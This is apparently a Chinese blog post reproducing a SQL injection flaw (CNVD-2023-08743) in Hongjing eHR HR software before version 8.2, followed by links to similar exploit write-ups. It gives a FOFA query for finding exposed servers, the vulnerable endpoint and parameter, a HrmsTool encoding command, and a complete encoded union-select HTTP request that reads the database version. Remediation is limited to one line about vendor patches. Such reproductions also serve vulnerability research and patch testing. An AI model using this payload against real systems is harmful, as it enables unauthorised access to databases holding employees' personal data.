宏景eHR SQL注入漏洞复现(CNVD-2023-08743)
0x01 产品简介
宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。
0x02 漏洞概述
宏景eHR 存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
0x03 影响范围
宏景eHR < 8.2
0x04 复现环境
FOFA:body='<div class="hj-hy-all-one-logo"'
0x05 漏洞复现
PoC(注入点是categories字段)
/servlet/codesettree?categories=[加密后的恶意sql]&codesetid=1&flag=c&parentid=-1&status=1
注:这里需要对hrms中的sql语句进行编码
工具地址:https://github.com/vaycore/HrmsTool
java -jar HrmsTool.jar -e "1' union all select 'hongjing',@@version--"
构造payload(查询数据库版本)
GET /servlet/codesettree?categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d&codesetid=1&flag=c&parentid=-1&status=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
复现成功
0x06 修复建议
目前软件已发布安全修复更新,受影响用户可以联系厂商获取补丁。
宏景eHR SQL注入漏洞复现(CNVD-2023-08743)相关推荐
- kkcms前台sql注入漏洞复现
kkcms前台sql注入漏洞复现 目录 安装kkcms 漏洞复现 安装kkcms 下载kkcms地址: https://github.com/https://github.com/ 浏览器访问主机ip ...
- espcms5.7.13 sql注入漏洞复现
espcms5.7.13 sql注入漏洞复现 作者: admin 时间: 2021-06-28 分类: 漏洞复现 使用代码审计工具自动审计,找到select语句,双击进入/adminsoft/cont ...
- 通达OA 11.5 SQL注入漏洞复现
0x00 漏洞描述 通达OA 11.5存在sql注入 0x01 漏洞影响版本 通达oa 11.5 0x02 漏洞复现 1.下载通达OA 11.5 https://cdndown.tongda2000. ...
- 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现
漏洞描述 泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 影响范围 使用oracle数 ...
- 畅捷通T+ SQL注入漏洞复现(QVD-2023-13612)
0x01 产品简介 畅捷通 T+ 是一款基于互联网的新型企业管理软件,功能模块包括:财务管理.采购管理.库存管理等.主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化.移动化.物联网.电子 ...
- (CVE-2020-9483)ApacheSkyWalking SQL注入 漏洞复现
漏洞信息 漏洞名称 ApacheSkyWalking SQL注入漏洞 漏洞编号 CVE-2020-9483 危害等级 高危 漏洞类型 通用型漏洞 漏洞厂商 Apache 漏洞概述 当使用H2 / My ...
- 【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)
文章目录 前言 声明 一.产品介绍 二.漏洞描述 三.影响范围 四.漏洞分析 五.漏洞复现 六.SQLMAP漏洞利用 七.修复方案 前言 泛微E-Cology v9 Browser.jsp 存在SQL ...
- 泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)
1.产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型协同管 ...
- 泛微E-Cology SQL注入漏洞复现(QVD-2023-15672)
0x01 产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型 ...
最新文章
- 【CTF】实验吧 困在栅栏里的凯撒
- 文件属性及资源文件的使用
- cocos2d-x中的curl
- android 拍照空指针,空指针异常时嵌入照片中的Android
- 2015年蓝桥杯C/C++ B组题目题解
- access开发精要(2)-参照完整性
- 内联函数和编译器对Go代码的优化
- 【docker】常用docker命令,及一些坑
- java idle 机制_HotSpot VM重量级锁降级机制的实现原理
- 小程序Windows和linux,改进后的《自动显示天气预报》小程序(Linux和Windows环境都可以)...
- 互联网项目架构经验分享
- 祝微软北京.net俱乐部徐磊生日快乐
- 电脑上有什么类似全能扫描王的软件?这4款扫描app1分钟帮你搞定几十张图片
- GCD栅栏函数和信号量
- TP6 微信小程序消息推送配置Token校验失败200302
- 【c#】 MVC模式 ——《七天学会》系列学习心得
- keil 局部变量不能查看值,显示为not in scope
- android逆向开发工程师需要掌握的技能
- 邵阳市计算机学校某灿,最近喜欢上一首歌。。 大家把自己觉得好听的歌和我分享分享吧。...
- GX、LS型螺旋输送机结构新颖 噪声低